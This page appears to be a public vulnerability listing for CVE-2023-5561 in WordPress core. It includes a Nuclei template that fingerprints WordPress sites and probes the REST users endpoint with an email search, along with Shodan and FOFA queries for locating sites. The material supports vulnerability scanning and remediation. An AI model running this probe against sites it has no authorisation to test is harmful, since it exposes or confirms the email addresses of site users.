CVE-2023-5561: WordPress Core - Post Author Email Disclosure

2025-08-01 WordPress Core PoC Public

Description

WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.

PoC

id: CVE-2023-5561

info:
  name: WordPress Core - Post Author Email Disclosure
  author: nqdung2002
  severity: medium
  description: |
    WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    This can allow unauthenticated attackers to brute force or verify the email addresses of users with published posts or pages on the site.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-470-631-sensitive-information-exposure-via-user-search-rest-endpoint?asset_slug=wordpress
    - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5561
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-5561
    cwe-id: CWE-200
    epss-score: 0.03862
    epss-percentile: 0.89643
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordpress
    product: wordpress
    framework: wordpress
    shodan-query:
      - cpe:"cpe:2.3:a:wordpress:wordpress"
      - http.component:"wordpress"
    fofa-query: body="oembed" && body="wp-"
  tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{route}}search=@"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/users?"
        - "?rest_route=/wp/v2/users&"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "[{\"id", "name\":")'
        condition: and
# digest: 4b0a00483046022100eaa73306c6bd58ff4f5bc2cbd6555ec9a8ef19d7be4ac4315c90869de7a38d0a02210089fea83fafe8d248f7bc833f72e82839395e8ed4f589286279435f041f7c4fac:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities